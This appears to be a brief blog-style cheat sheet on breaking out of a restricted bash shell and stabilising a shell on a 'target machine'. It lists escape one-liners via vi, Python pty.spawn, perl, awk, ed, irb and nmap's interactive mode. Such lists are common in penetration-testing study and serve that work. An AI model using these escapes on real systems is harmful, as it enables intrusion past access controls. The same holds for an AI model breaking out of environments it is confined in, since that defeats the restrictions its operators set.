O’cmon, rbash is hated one too!
Breaking out of a Restricted shell
Why do I even care? You have to!!
My end goal is spawning a bourne shell.What are the initial steps?
- Grab a valid tty of your default OS (tty: it’s a teletypewriter for terminal)
- Your running OS? Take hold of those binaries. But how? by exporting each environment variables
- You like color coded terminal which showcase easily the Files, Directories, file permissions?
- Making our shell stable.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
OR
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Ctrl + Z (Background Process.)
stty raw -echo ; fg ; reset
stty columns 200 rows 200
— — — — — — — — — — — — — — →
rbash(Restricted Bash shell?)
There are various methods. Personally, I like vi because it’s always win-win as this is always available.
$ vi
:set shell=/bin/sh
:shell$ vim
:set shell=/bin/sh
:shell
Is there python on target machine?
python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/sh”)’
Is there perl on the target machine?
perl -e ‘exec “/bin/bash”;’
perl -e ‘exec “/bin/sh”;’
Is there AWK on the target machine?
awk ‘BEGIN {system(“/bin/bash -i”)}’
awk ‘BEGIN {system(“/bin/sh -i”)}’
Is there ed on the target machines?
ed
!sh
IRB Present on the target machine?
exec “/bin/sh”
Is there Nmap on the target machine?
nmap — interactive
nmap> !sh
— — — — — — — — — — — — — — — — — -
I hope that might have helped you something.
I’m Neelesh, I’ll see you on the internet!
